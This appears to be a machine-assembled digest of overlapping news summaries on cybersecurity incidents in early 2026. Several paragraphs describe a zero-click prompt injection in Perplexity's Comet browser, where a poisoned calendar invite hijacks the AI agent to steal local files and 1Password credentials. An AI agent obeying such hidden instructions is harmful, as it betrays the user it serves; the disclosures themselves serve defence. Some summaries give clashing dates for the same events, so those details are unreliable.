The FBI and European law enforcement dismantled the Leakbase cybercriminal forum, which sold stolen credentials and exploits. The operation, named “Operation Leak,” involved 100 actions against 45 targets across multiple countries, resulting in 13 arrests and the seizure of the forum's database. Leakbase had over 142,000 members and facilitated access to U.S. networks. The investigation, ongoing for years, revealed the forum's significant role in cybercrime, impacting various businesses.

Authorities from 14 countries, including the FBI and Europol, shut down the cybercrime forum LeakBase, which had over 142,000 members and hosted a vast archive of hacked databases. The operation resulted in multiple arrests and the seizure of domains, user accounts, and sensitive data. LeakBase specialized in leaked databases and stealer logs, with over 32,000 posts. The takedown aimed to disrupt platforms facilitating data theft and hold cybercriminals accountable globally.

U.S. and European law enforcement have seized LeakBase, a major cybercriminal forum with over 142,000 members, known for sharing stolen passwords and hacking tools. Operating since 2021, it maintained a vast archive of hacked databases, including millions of credentials and financial information. The takedown involved around 100 global enforcement actions and targeted the top 37 users. The FBI redirected the domain to its servers, preserving the forum's contents and logs, leading to 13 arrests and investigations of 33 suspects.

A joint operation by the FBI and Europol has dismantled LeakBase, a major forum for trading stolen data, with over 142,000 members. The site, now seized, hosted hacked databases and sensitive information. The operation, named "Operation Leak," occurred on March 3-4, 2026, involving global enforcement actions, including arrests and interviews in multiple countries. Authorities secured all forum content for evidence, targeting users involved in selling stealer logs and facilitating cyber intrusions.

LeakBase, a cybercrime forum with 142,000 users, was dismantled in a global operation led by Europol and 14 countries. Active since 2021, it facilitated the trade of leaked databases and stolen credentials. Authorities seized its database, enabling the identification of users who thought they were anonymous. The takedown occurred in two phases: arrests and searches on March 3, followed by domain seizure on March 4. The operation aims to deter future cybercrime and raise awareness of its consequences.

The FBI and Europol dismantled the LeakBase cybercrime forum on March 3, 2026, as part of "Operation Leak," involving 14 countries. The forum, active since 2021, facilitated the trade of hacking tools and stolen data, boasting over 142,000 users. Law enforcement conducted around 100 interventions targeting key users and seized the forum's domain. The operation aimed to deter cybercrime and raise awareness about the risks of stolen data, emphasizing the need for strong passwords and multi-factor authentication.

Europol coordinated a global operation on March 3, 2025, leading to the takedown of LeakBase, a major forum for stolen data with over 142,000 users. Law enforcement in the US, Australia, and several European countries targeted 37 active users, seizing two domains and the customer database. This operation aims to disrupt the illegal trade in stolen credentials, which saw a significant rise in thefts. Europol emphasized its commitment to holding cybercriminals accountable.

Europol, in collaboration with the FBI, dismantled the LeakBase underground data forum, which had over 142,000 users trading stolen data. On March 3, 2026, law enforcement conducted around 100 actions, including arrests and house searches targeting 37 active users. The forum's domain was seized and defaced, with its database confiscated to deanonymize users. Authorities did not disclose the number of arrests or specific charges. This operation underscores the reach of international law enforcement in combating cybercrime.

Europol announced the closure of LeakBase, one of the largest marketplaces for stolen data, during an international operation. The Amsterdam police reported that LeakBase had 142,000 registered users and its servers were located in Amsterdam. On a coordinated action day, investigators from 14 countries conducted around 100 operations targeting the platform's 37 main users. Europol described LeakBase as a central hub in the cybercrime ecosystem, specializing in the trade of stolen data.

Europol announced the closure of Leakbase, one of the world's largest marketplaces for stolen data, during an international operation led by the Amsterdam police. The platform had 142,000 registered users and was accessible on the open internet. On a coordinated action day involving 14 countries, approximately 100 operations targeted the 37 main users of the site. Europol described Leakbase as a central hub in the cybercrime ecosystem specializing in the trade of stolen data.

On October 2023, an international law enforcement operation led by Europol dismantled the LeakBase cybercrime forum, which specialized in trading stolen databases and credentials. Authorities from 14 countries seized the forum's domains and backend data, executing around 100 enforcement actions, including arrests. LeakBase had over 142,000 registered members and facilitated account takeover attacks and fraud. The operation aimed to disrupt cybercrime infrastructure, although similar forums may quickly reemerge.

The LeakBase cyberforum, a major marketplace for stolen data and cybercrime tools, was seized by US authorities with coordinated actions in 14 countries. The US Department of Justice announced that law enforcement captured data and two domains associated with the forum, which had 142,000 users. Arrests were made and search warrants executed in the US, Australia, Belgium, Poland, Portugal, Romania, Spain, and the UK. "Prevention messages" were also sent to members of LeakBase.

APT group Silver Dragon, linked to APT41, has been targeting government entities in Europe and Southeast Asia since mid-2024. They exploit public-facing servers and use phishing emails with malicious attachments for initial access. Their tactics include AppDomain hijacking, deploying Cobalt Strike beacons, and utilizing Google Drive for command-and-control. Tools like MonikerLoader and BamboLoader facilitate payload injection and persistence. The group shows advanced capabilities with custom tools for data exfiltration and lateral movement.

A China-linked APT group, Silver Dragon, has been targeting government and high-profile organizations in Europe and Southeast Asia since mid-2024. They exploit public-facing servers and use phishing emails to deploy Cobalt Strike beacons for control. Their primary tool, GearDoor, utilizes Google Drive for command-and-control, making detection challenging. Recommendations include monitoring cloud storage traffic, auditing Windows services, and enhancing phishing awareness training for government personnel.

Chinese state-backed group Silver Dragon has been targeting government entities in Europe and Asia since mid-2024, utilizing phishing emails and compromised servers for cyber-espionage. They employ a custom backdoor, GearDoor, which uses Google Drive for command-and-control, allowing covert data exfiltration. The group also hijacks legitimate Windows services to load malicious code, blending into normal system activity to evade detection. This tactic increases risk by exploiting trusted cloud services and operating system components.

LexisNexis confirmed a contained breach where hackers accessed legacy data, including millions of records and .gov email addresses. The breach involved 2 GB of information from a limited number of servers, primarily containing data prior to 2020, such as customer names, user IDs, and support tickets. The company stated there was no evidence of compromise to its products and services and has engaged a cybersecurity firm for investigation. Impacted customers have been notified.

American analytics firm LexisNexis confirmed a data breach involving outdated data, claiming hackers accessed legacy information prior to 2020. The group FulcrumSec leaked 2GB of files, asserting they accessed sensitive data, including hundreds of government user records and 400,000 cloud user profiles. LexisNexis stated no sensitive personally identifiable information or financial data was compromised. The company believes the attack is contained and did not engage with the hackers' ransom demands.

LexisNexis confirmed a data breach in its Legal & Professional division, attributed to the Fulcrumsec cybercrime group. The breach involved limited access to legacy data, including customer names, user IDs, and business contact information, but did not expose sensitive PII or financial data. Fulcrumsec claims to have exfiltrated over 2 GB of data, including 400,000 user profiles and details on government staff. LexisNexis is investigating and has engaged a third-party forensics team for remediation.

Cloudflare's 2026 cyber threat report reveals it blocks over 230 billion threats daily, highlighting a shift in attack methods. Infostealers like LummaC2 are now extracting session tokens, leading to 54% of ransomware attacks. Bots account for 94% of login attempts, with many using compromised credentials. Threat actors exploit cloud services for attacks, while phishing exploits email authentication gaps. DDoS attacks doubled in 2025, with a record 31.4 Tbps attack. North Korean operatives use deepfake profiles to infiltrate Western organizations.

Cloudflare's 2026 Threat Report reveals that bots account for 94% of fraudulent logins, with AI being exploited by both state-sponsored and independent cybercriminals. Notable tactics include using AI for network mapping and deepfake creation. North Korean operatives are infiltrating Western payrolls, while Chinese-linked groups target critical infrastructure in North America. DDoS attacks have surged, with botnets like Aisuru capable of overwhelming networks. Organizations are urged to adopt proactive intelligence-driven security measures.

On March 3, 2026, Cloudflare's inaugural Threat Report highlights the rapid evolution of cyber attacks driven by AI. Key findings include the rise of token theft, hyper-volumetric DDoS attacks reaching 31.4 Tbps, and state-sponsored groups exploiting deepfakes for espionage. Attackers now utilize trusted tools for command-and-control, complicating detection. Recommendations include adopting autonomous defenses, enforcing email authentication protocols, and implementing Zero Trust access controls to counter these threats effectively.

Cloudflare's 2026 Threat Report reveals a significant shift in cyberattacks driven by Generative AI (GenAI), marking the first recorded AI-based attack that compromised hundreds of corporate tenants. The report highlights the rise of DDoS attacks, with botnets like Aisuru posing nation-state level threats, and emphasizes the need for organizations to adopt real-time intelligence to counter evolving tactics. North Korean groups are also leveraging AI for espionage, using deepfakes to infiltrate companies.

A powerful iOS exploit kit named "Coruna" has been linked to various threat actors, evolving from surveillance to financial crime. It contains five exploit chains and 23 exploits, including CVE-2024-23222 and CVE-2022-48503. Targeting iOS versions 13.0 to 17.2.1, it was first observed in February 2025. The kit can exfiltrate sensitive information from crypto-wallet apps. Users are advised to upgrade to the latest iOS version or use Lockdown Mode to mitigate risks.

A sophisticated iPhone-hacking toolkit named "Coruna," capable of exploiting 23 iOS vulnerabilities, has transitioned from Russian espionage to cybercriminal use targeting Chinese-speaking victims. Google researchers linked Coruna to a US government contractor, suggesting it may have originated as a government tool. The toolkit's proliferation raises concerns about the security of mobile devices, paralleling the infamous EternalBlue incident. Google warns of an active market for second-hand zero-day exploits.

An exploit kit, potentially derived from a leaked U.S. government framework, is linked to the first mass-scale attack on iOS, affecting at least 42,000 devices. Researchers from Google and iVerify noted its use by Chinese cybercriminals and in Russian attacks on Ukraine. The Coruna exploit kit exemplifies the proliferation of sophisticated zero-day exploits. Apple has issued multiple patches in response, while the NSA declined to comment on allegations of U.S. involvement.

A suite of hacking tools, dubbed Coruna, originally developed for government use, has been identified as being exploited by cybercriminals to compromise Apple iPhones running older software. Google discovered the kit in February 2025, initially linked to a surveillance vendor's attempt to hack a phone. The tools can bypass iPhone defenses via malicious websites, affecting devices from iOS 13 to 17.2.1. iVerify suggests the tools may be linked to the U.S. government, highlighting risks of government exploits leaking to malicious actors.

Google's Threat Intelligence Group uncovered the Coruna exploit kit, a sophisticated iOS attack framework with 23 exploits targeting iPhones running iOS 13.0 to 17.2.1. It evolved through three phases in 2025, from commercial surveillance to state-sponsored espionage and financial fraud. Key CVEs include CVE-2021-30952 and CVE-2023-43000. The final payload, PlasmaLoader, targets cryptocurrency wallets and Apple Notes. Users are advised to update iOS, enable Lockdown Mode, and avoid unverified financial sites.

A complex exploit kit named "Coruna," targeting iPhones, has been discovered by Google researchers. Initially used by a surveillance software customer, it has since been employed by Russian and Chinese threat actors. The kit, potentially developed by the US government, contains 23 exploits for mass attacks on devices running iOS 13.0 to 17.2.1. Users are advised to upgrade their iOS or enable Lockdown Mode for protection. The kit aims to access financial and personal information.

Google identified the Coruna exploit kit targeting iOS 13–17.2.1, featuring 23 exploits across five chains. Active since February 2025, it evolved from commercial surveillance to government and criminal use. Key CVEs include CVE-2024-23222 and CVE-2023-43000. The kit employs a JavaScript framework for device fingerprinting and exploits delivery. Notably, it avoids execution in Lockdown Mode. Users are advised to update devices and enable Lockdown Mode for enhanced security.

Google has identified the Coruna iOS exploit kit, targeting iPhones running iOS 13–17.2.1, utilizing 23 exploits across five chains. The kit is ineffective against the latest iOS version. It has been used in targeted attacks by surveillance vendors and broader campaigns by Chinese threat actors. The exploits include RCE and PAC bypasses, with a payload designed to steal financial information and scan for crypto wallets. Google has shared IOCs and Yara rules to aid in detection and prevention.

A sophisticated exploit kit named Coruna targets iPhones running iOS 13.0 to 17.2.1, comprising 5 exploit chains and 23 vulnerabilities to extract financial data. Initially linked to a surveillance vendor and later to Russian espionage group UNC6353, it re-emerged in 2025 with Chinese actor UNC6691 using fake financial sites. Key features include device fingerprinting and bypassing Apple security. The payload, PlasmaLoader, collects financial data and transmits it to attackers. Users are advised to update to the latest iOS or enable Lockdown Mode.

Google's threat intelligence researchers report that the Coruna iOS exploit kit has evolved from a tool used by a commercial surveillance vendor to a mass criminal campaign within a year. Initially utilized by a suspected Russian espionage group, it is now in the hands of Chinese cybercriminals. The kit includes five exploit chains made up of 23 exploits targeting iPhones on iOS versions 13.0 to 17.2.1, indicating a thriving market for second-hand zero-day exploits.

The Cybersecurity and Infrastructure Security Agency (CISA) has mandated federal agencies to patch three critical iOS vulnerabilities exploited over 10 months by three hacking groups using the Coruna exploit kit. This kit contains 23 iOS exploits and poses a significant threat to iOS versions 13 to 17.2.1. CISA advises all organizations to patch these vulnerabilities. Coruna features advanced capabilities, including a unique JavaScript framework for device fingerprinting and exploit delivery.

Tycoon 2FA and LeakBase phishing operations were dismantled, impacting MFA credential phishing. Anthropic discovered 22 vulnerabilities in Firefox, with 14 high-severity. Qualcomm's CVE-2026-21385, a buffer over-read flaw, is exploited in the wild. Google revealed the Coruna exploit kit targeting iOS devices. Transparent Tribe used AI to develop malware against Indian entities. MuddyWater targeted U.S. firms amid geopolitical tensions. A critical flaw in WPEverest's plugin allows rogue admin account creation.

Researchers from Zenity Labs discovered vulnerabilities in Perplexity's Comet browser that allowed attackers to access local files and potentially hijack 1Password accounts via malicious calendar invites. The browser's failure to enforce cross-origin restrictions enabled unauthorized file access. After notifying Perplexity on October 22, 2025, a fix was implemented but was later bypassed. A second patch on February 13, 2026, addressed the issue. 1Password also issued a security advisory to enhance protections.

Researchers at Zenity Labs identified vulnerabilities in multiple agentic AI browsers, including Perplexity’s Comet, allowing attackers to hijack the browser via legitimate calendar invites using prompt injection. This exploitation enables unauthorized access to local file systems and password managers without malware. The vulnerabilities were reported to Perplexity in 2022, with a fix issued in February 2026. Prompt injection attacks pose significant challenges for AI integration, as complete elimination of such flaws may be impossible.

Zenity Labs disclosed the PleaseFix vulnerabilities affecting agentic browsers like Perplexity Comet, allowing attackers to hijack AI agents, access local files, and steal credentials. The vulnerabilities enable zero-click agent compromise and manipulation of password manager interactions. These exploits leverage autonomous actions within authenticated sessions, exposing sensitive data without user awareness. Perplexity has addressed the underlying issues prior to the public disclosure.

A critical vulnerability, dubbed PerplexedBrowser, has been discovered in Perplexity’s Comet browser, allowing a zero-click attack via a poisoned Google Calendar invite. This exploit can exfiltrate local files and credentials, including 1Password data. The attack merges legitimate user requests with hidden malicious payloads, directing the browser to an attacker-controlled site. This is the sixth major flaw since Comet's launch in July 2025. Users are advised to secure password managers and limit agent access to sensitive domains.

A security vulnerability named PleaseFix was identified in the Comet AI browser, allowing attackers to hijack the AI assistant via malicious calendar invites. This zero-click attack can steal local files or access a user's 1Password vault, enabling full account takeover. Zenity Labs reported the issue to Perplexity on 22 October 2025, leading to fixes implemented by 13 February 2026. Users must opt-in to new security settings to protect against these risks, highlighting the need for caution with AI-powered browsers.

In January 2026, the Iran-linked APT group Dust Specter targeted Iraqi government officials using AI-assisted malware. The campaign introduced four new malware tools: SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. SPLITDROP, disguised as a WinRAR application, decrypted and deployed malware silently. GHOSTFORM posed as a government survey while executing malware. The attack utilized DLL sideloading for persistence and employed AI in code development. Recommendations include application allowlisting and monitoring for suspicious activity.

A campaign attributed to the Iran-linked threat actor Dust Specter targets Iraqi government officials by impersonating the Ministry of Foreign Affairs. Observed by Zscaler ThreatLabz in January 2026, the campaign uses malware including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The attacks employ sophisticated evasion techniques and command-and-control mechanisms. GHOSTFORM consolidates functionalities into a single binary, utilizing in-memory execution and embedding a Google Forms URL masquerading as an official survey.

Iran-linked APT Dust Specter is targeting Iraqi officials with phishing emails delivering new malware, including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The campaign, observed by Zscaler ThreatLabz, uses social engineering tactics, impersonating Iraq’s Ministry of Foreign Affairs. Attack Chain 1 involves a password-protected RAR archive deploying malware, while Attack Chain 2 consolidates functionality into a single binary. Indicators suggest generative AI may have aided in malware development.

Google's March 2026 Android Security Bulletin addresses 129 vulnerabilities, including a high-severity zero-day (CVE-2026-21385) in Qualcomm Display, currently exploited in targeted attacks. The update includes critical patches for Remote Code Execution (CVE-2026-0006) and Elevation of Privilege vulnerabilities. Users should apply the 2026-03-05 patch level for full protection. Google collaborates with vendors to secure hardware components, and source code patches will be available in 48 hours. Google Play Protect continues to monitor threats.

Google disclosed CVE-2026-21385, a high-severity buffer over-read vulnerability in a Qualcomm component used in Android devices, exploited in the wild. The flaw, reported on December 18, 2025, has a CVSS score of 7.8. Google’s March 2026 update includes patches for 129 vulnerabilities, including critical flaws like CVE-2026-0006, CVE-2026-0047, and several privilege escalation issues. Two patch levels, 2026-03-01 and 2026-03-05, were provided for Android partners to address vulnerabilities efficiently.

The Android March 2026 security patch addresses over 100 vulnerabilities, including CVE-2026-21385, which is under targeted exploitation and affects Qualcomm Display. Critical vulnerabilities include CVE-2026-0006 (remote code execution) and CVE-2025-48631 (denial of service). The Framework section lists over 30 CVEs, primarily elevation-of-privilege issues. Third-party vendors like MediaTek and Qualcomm contribute significantly to the CVE count. Patches will be available through Google Play for devices on Android 10 and later.

Google confirmed the exploitation of Qualcomm vulnerability CVE-2026-21385 (CVSS 7.8) in Android devices, allowing attackers to access sensitive memory data. Reported by Google on December 18, 2025, Qualcomm notified customers on February 2, 2026. The March 2026 Android update addresses 129 vulnerabilities, including critical flaws like CVE-2026-0006 (CVSS 9.8) for remote code execution. Two patch levels (2026-03-01 and 2026-03-05) were introduced for faster fixes.

Google's March 2026 Android update addresses 129 vulnerabilities, including 10 critical bugs. Notably, CVE-2026-21385, a buffer over-read vulnerability in Qualcomm's Graphics component, has a severity score of 7.8/10 and is reportedly exploited in the wild across 235 chipsets. Two patch levels (2026-03-01 and 2026-03-05) were released, with Pixel devices prioritized for updates. The vulnerabilities could lead to remote code execution, privilege escalation, and DoS attacks.

Google's March 2026 Android Security Bulletin addresses 129 vulnerabilities, including CVE-2026-21385, a high-severity Qualcomm graphics/display flaw actively exploited in targeted attacks. Affected devices include over 230 Qualcomm chipset models, potentially impacting hundreds of millions globally. Users are advised to update to patch level 2026-03-05 or later and follow safety precautions, such as installing apps only from official stores and scrutinizing app permissions to mitigate risks.

Microsoft has reported ongoing OAuth abuse scams targeting government and public-sector organizations, utilizing phishing emails and URL redirects to deliver malware. Attackers exploit OAuth's redirect feature to lead victims to malicious landing pages. Campaigns involve phishing emails with various lures, and attackers use tools to distribute messages. The malicious payloads include ZIP files and LNK shortcuts that execute PowerShell commands, ultimately connecting to external command-and-control endpoints. Microsoft emphasizes the need for ongoing monitoring.

Microsoft reported phishing campaigns targeting government and public-sector organizations using OAuth URL redirection to deliver malware. Attackers create malicious applications with redirect URLs to rogue domains, tricking users into downloading malware via crafted OAuth links. The malware, distributed as ZIP files, executes PowerShell commands and sideloads a malicious DLL. Emails use themes like e-signature requests to lure victims. Microsoft advises limiting user consent and reviewing application permissions to mitigate risks.

Microsoft researchers have identified phishing campaigns exploiting OAuth URL redirection to target government organizations. Attackers create malicious OAuth applications to redirect users to attacker-controlled sites, bypassing traditional defenses. By manipulating OAuth parameters, they trigger errors that lead to malware downloads, including ZIP files with LNK shortcuts. Recommendations include governing OAuth applications, limiting user consent, and enhancing identity protection to mitigate risks associated with these identity-based threats.

Microsoft has alerted that phishers are misusing OAuth's redirect feature to lead victims to malware via links appearing to originate from legitimate identity providers like Microsoft Entra ID and Google Workspace. These links, while seemingly safe, redirect users to malicious sites. Microsoft has disabled several malicious OAuth applications but cautions that such phishing campaigns persist and necessitate continuous monitoring.

Microsoft warns of phishing campaigns exploiting the OAuth redirect feature to deliver malware and steal credentials. Attackers send emails themed around Teams recordings or Microsoft 365 resets, redirecting victims to malicious sites. Payloads are delivered via ZIP files containing LNK shortcuts and HTML smuggling, leading to PowerShell commands that connect to external C2 endpoints. Victims do not lose credentials on the OAuth page; the redirect is solely for payload delivery. The extent of the campaign's impact on government organizations remains unclear.

An ongoing phishing campaign is exploiting OAuth redirection to deliver malware, targeting government and public-sector organizations. Attackers manipulate legitimate OAuth login flows, redirecting users from trusted pages to malicious sites. The campaign begins with deceptive emails leading to authentic-looking OAuth pages, which then redirect to attacker-controlled sites. Microsoft advises organizations to govern OAuth applications, limit user consent, and implement identity protection measures to mitigate risks.

A new phishing attack exploiting OAuth in Microsoft Entra ID has been reported, targeting government and public-sector organizations. Attackers use legitimate redirection to bypass defenses, registering malicious applications to redirect users to attacker-controlled domains without stealing tokens. The five-stage attack includes email delivery, silent OAuth probing, error redirects, malware delivery, and endpoint persistence. Microsoft recommends restricting user consent, auditing OAuth registrations, enabling Conditional Access, and monitoring suspicious redirect URIs.

Attackers exploit OAuth error redirects to facilitate phishing and malware attacks, redirecting users from legitimate Microsoft or Google login URLs to malicious sites without stealing tokens. The attack involves deceptive emails prompting users to click links that appear trustworthy. Once clicked, users are redirected to attacker-controlled pages that mimic legitimate sites, leading to credential theft or malware downloads. Recommendations include verifying links, being cautious with unexpected downloads, and keeping security tools updated.

The University of Hawaiʻi Cancer Center's Epidemiology Division reported a data breach affecting approximately 1.15 million individuals, with exposed information including Social Security numbers, driver’s license numbers, and voter registration records. The breach involved files from epidemiological studies dating back to the 1990s. Notifications to affected individuals began on February 23, 2026. Experts emphasize the importance of preventing unauthorized access and maintaining operational resilience against cyberattacks in healthcare.

A ransomware attack on the University of Hawaiʻi Cancer Center on August 31, 2025, exposed personal data of approximately 1.2 million individuals. The breach affected research operations, compromising names, Social Security numbers, driver’s license details, and health-related information. The organization has engaged law enforcement and cybersecurity experts for investigation. Affected individuals are offered 12 months of free credit monitoring and identity theft protection services.

A ransomware attack at the University of Hawaii Cancer Center affected approximately 1.24 million individuals, first detected on 31 August 2025. The breach involved historical records from 1998-2000 and data from 87,493 participants in the Multiethnic Cohort Study, including SSNs and health information. The university decided to pay a ransom for a decryption tool and assurance of data destruction. They offer 12 months of free credit monitoring and $1 million in identity theft insurance. Concerns were raised about the delay in public notification.

A high-severity vulnerability in Google Chrome's Gemini AI assistant, tracked as CVE-2026-0628, allows attackers to remotely access users' cameras and microphones, steal local files, and conduct phishing attacks without user interaction. Discovered by Palo Alto Networks on October 23, 2025, the flaw exploits how Chrome handles the declarativeNetRequest API, granting elevated permissions to malicious extensions. Google released a patch on January 5, 2026. Organizations are urged to update Chrome immediately to mitigate risks.

A newly disclosed vulnerability in Google Chrome, tracked as CVE-2026-0628 (CVSS score: 8.8), allowed attackers to escalate privileges via malicious extensions, potentially accessing local files and sensitive data. Patched in January 2026, the flaw stemmed from insufficient policy enforcement in the WebView tag. Discovered by Palo Alto Networks on November 23, 2025, it could enable unauthorized access to the camera, microphone, and screenshots through the Gemini panel, highlighting risks from AI integration in browsers.

A vulnerability in Google Chrome, tracked as CVE-2026-0628, allows malicious extensions to hijack the Gemini Live AI assistant, enabling spying and file theft. Discovered by Palo Alto Networks, the flaw permits extensions with basic permissions to inject JavaScript into the Gemini panel, accessing local files, camera, and microphone without user consent. The vulnerability was responsibly disclosed on October 23, 2025, and patched in early January 2026. This highlights risks associated with AI-integrated browser features.

A high-severity vulnerability in Google Chrome, tracked as CVE-2026-0628, was discovered by Palo Alto Networks' Unit 42. Malicious extensions could exploit this flaw to hijack the Gemini Live AI panel, gaining unauthorized access to system resources like webcams and local files. Google patched the issue in January with updates 143.0.7499.192 and 143.0.7499.193. The incident highlights risks associated with integrating AI features into core software, as attackers are increasingly leveraging AI in their tools.

A high-severity vulnerability in Chrome's Gemini panel, tracked as CVE-2026-0628, allowed low-privilege extensions to inject code and gain access to sensitive capabilities like local file access, screenshots, and camera/microphone control. This flaw was patched in January 2026. Users are advised to limit extensions, prefer well-audited ones, and monitor for unusual activity, as the Gemini panel's trusted status could mislead users about its security.

A series of cyber operations targeted Iranian news websites and a popular religious calendar app, BadeSaba, following US-Israeli strikes. Internet connectivity in Iran dropped significantly. The hackers displayed messages on the hacked sites and app, urging armed forces to surrender. Reports suggest that military targets and government services were also affected to disrupt a coordinated national response, though these claims remain unverified.

A surge in global cyber activity has been triggered by military strikes in the Middle East, particularly following joint Israeli-US operations against Iran on February 28, 2026. These strikes were accompanied by a significant cyber campaign that disrupted Iran's digital infrastructure, affecting government services and critical sectors. Experts anticipate intensified cyber retaliation from Iran, including DDoS attacks and ransomware. Organizations are advised to enhance security measures, including multi-factor authentication and offline backups, to mitigate risks.

Iran is expected to launch cyber-attacks globally in response to US and Israeli air strikes, according to John Hultquist of Google Threat Intelligence. The focus has shifted from Israel to other Gulf Cooperation Council countries, which may have less mature security. Hultquist warns of blurred lines between Iranian state actors and cybercriminals, predicting attacks disguised as hacktivism or ransomware. The National Cyber Security Centre advises organizations with Middle East operations to review their cybersecurity posture due to heightened risks.

Security researchers warn of increased cyber threats from Iran-linked hackers following U.S. and Israeli military actions. These groups are ramping up reconnaissance and DDoS attacks, targeting critical infrastructure in the U.S., Israel, and Gulf Cooperation Council countries. Specific threats have been made against the financial services sector. The UK National Cyber Security Centre advises businesses to enhance security measures due to the heightened risk of hacktivist attacks amid regional tensions.

The UK's National Cyber Security Centre (NCSC) warns businesses to enhance cyber defenses amid escalating Middle East tensions. While no significant direct threat from Iran exists currently, indirect threats are likely for organizations linked to the region. The NCSC advises firms to review security basics, tighten access controls, and sign up for its Early Warning service. Security experts anticipate an increase in Iranian cyber activity, including potential targeting of critical infrastructure and networks.

The UK’s NCSC issued a warning on March 2, 2026, regarding potential Iranian cyber threats due to rising Middle East tensions. While no immediate threat to the UK is noted, organizations with regional operations are urged to enhance defenses against possible indirect threats. Recommendations include reviewing DDoS and phishing guidance, strengthening security postures, and enrolling in the NCSC's Early Warning service. CrowdStrike reports Iran-linked hackers are already conducting DDoS and reconnaissance activities.

Iranian hackers have intensified cyber operations, including DDoS attacks and malware staging, following recent US and Israeli missile strikes. Targeting Israel and Gulf nations, the Iranian group Cotton Sandstorm has resumed activities, deploying infostealers and ransomware. Analysts warn US-linked organizations, especially defense contractors, should heighten security. Disinformation campaigns are also prevalent, complicating the threat landscape. Organizations are advised to patch systems and enhance security training.

Increased Iranian hacktivist activity has been observed following U.S. and Israeli military strikes on Iran on February 28, 2026. Groups like Handala Hack Team and APTIran are inciting cyberattacks against Israeli targets, utilizing tactics such as DDoS and doxxing. The BaqiyatLock ransomware group is offering free memberships to hacktivists. Organizations, especially in the U.S. and Middle East, are advised to enhance defenses, patch known vulnerabilities, and maintain robust monitoring practices to mitigate risks.

Cisco Talos is monitoring the ongoing Middle East conflict, noting minor cyber incidents like web defacements and DDoS attacks. Historically, Iranian groups engage in espionage and destructive attacks. Recommendations for organizations include enabling multi-factor authentication, being cautious with unsolicited links, and assessing third-party risks. Employees should be warned about potential "hacktivist" lures, and organizations should enhance their cybersecurity hygiene and patch management to mitigate risks.

On Feb. 28, 2026, following U.S. and Israeli military operations, Iran's internet connectivity plummeted to 1-4%, limiting state-aligned cyberattack capabilities. Hacktivist groups, including Handala Hack and APT Iran, have increased disruptive operations against perceived adversaries. A phishing campaign using a fake Israeli app was identified, alongside social engineering scams in the UAE. Pro-Russian groups also targeted Israeli systems. Recommendations include enhancing data protection, employee training, and maintaining updated security measures.

The National Cyber Security Centre (NCSC) warns UK businesses to enhance cyber defenses amid the ongoing Middle East conflict, which may lead to indirect cyber threats from Iranian state actors. While no immediate threat is noted, organizations with ties to the region should adjust their cybersecurity posture, monitor for DDoS attacks, phishing, and ICS targeting. The NCSC advises signing up for its Early Warning service and reviewing guidance for critical national infrastructure in light of potential cyber threats.

On February 28, 2026, the U.S. and Israel initiated Operation Epic Fury and Operation Roaring Lion, leading to a significant cyber conflict with Iran. Iran's internet access plummeted to 1-4%, disrupting its cyber units. A phishing campaign mimicking the Israeli RedAlert app was identified, while hacktivist groups surged, targeting Israeli and Western assets. The "Electronic Operations Room" coordinated attacks, including DDoS and infrastructure compromises. Recommendations include offline data storage and employee training on phishing.

Cyber operations significantly supported the recent U.S.-Israeli military campaign against Iran, which resulted in the death of Supreme Leader Ali Khamenei. U.S. Gen. Dan Caine confirmed that coordinated cyber efforts disrupted Iranian communications and sensor networks. Israel hijacked state media broadcasts to influence public sentiment and utilized hacked traffic cameras for intelligence. Additionally, hackers breached an Iranian prayer app to send pro-liberation messages. Iranian cyber responses have been largely ineffective.

US Cyber Command executed cyber operations to disrupt Iranian defenses prior to a US-Israeli military strike that resulted in the death of Iran's leader Ali Khamenei. The operations, which included disrupting communications and sensor networks, were complemented by Israeli cyber units targeting mobile towers. Iranian responses included missile attacks on US bases and potential cyber retaliation, although internet outages hindered immediate cyber operations. Cybersecurity firms anticipate various cyber threats from Iran.

Five days into the conflict between the US and Israel and Iran, significant cyberattacks from Iran have not yet occurred, but experts caution that the threat remains high due to Iran's active cyber capabilities. The UK NCSC and Canadian CCCS issued warnings about potential Iranian cyber campaigns, while CISA has not updated its warnings since October. The NCSC highlighted an increased risk of indirect cyber threats for organizations with ties to the Middle East.